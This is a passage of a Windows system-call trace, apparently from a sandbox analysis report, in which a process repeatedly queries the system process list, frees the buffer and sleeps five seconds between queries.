Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.672] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.692] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.703] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.717] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.736] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.749] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.764] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.780] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.796] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.807] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.811] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.826] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.843] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.858] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.873] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.889] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.908] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.936] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.953] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.967] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.984] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.999] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.015] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.026] 